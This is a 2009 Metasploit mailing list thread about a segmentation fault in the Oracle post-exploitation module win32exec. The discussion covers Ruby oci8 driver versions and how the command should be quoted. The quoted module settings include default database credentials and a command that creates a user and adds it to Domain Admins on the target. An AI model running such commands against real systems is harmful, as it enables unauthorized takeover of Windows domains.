Metasploit mailing list archives

Re: SEG FAULT while launching auxiliary


From: Giorgio Casali <giorgio.casali () gmail com>
Date: Thu, 10 Dec 2009 09:50:18 +0100

I followed the instruction on the wiki you MC mentioned.
I think that it may be the fact that I didn't escaped the command properly:

net user haz0r pass111! /ADD /DOMAIN && net group Domain Admins h4ckm3 /ADD

should be

net user haz0r pass111! /ADD /DOMAIN && net group \"domain admins\" h4ckm3
/ADD

I'll verify that asap and report.

Thanks.



2009/12/4 MC <mc () metasploit com>

you shouldn't need dbi anymore.. what version of ruby are you running?

from the wiki.

########################
# Install ruby-oci8-1.0.0  VERSION IS IMPORTANT!!
# http://rubyforge.org/projects/ruby-oci8/
# http://rubyforge.org/frs/download.php/28396/ruby-oci8-1.0.0.tar.gz
# If using ruby 1.9, grab this version of the oci8 driver.
# http://rubyforge.org/frs/download.php/65896/ruby-oci8-2.0.3.tar.gz
########################

~mc


On Fri, 4 Dec 2009, Giorgio Casali wrote:

 Hi I was using the auxiliary admin/oracle/sql like this
use admin/oracle/post_exploitation/win32exec

set SID TEST
set DBUSER SYSTEM
set DBPASS MANAGER
set RHOST x.y.z.k
set CMD "net user haz0r pass111! /ADD /DOMAIN && net group Domain Admins
h4ckm3 /ADD"

and I got SEG FAULT.

Might it be the oci or dbi driver ?





_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: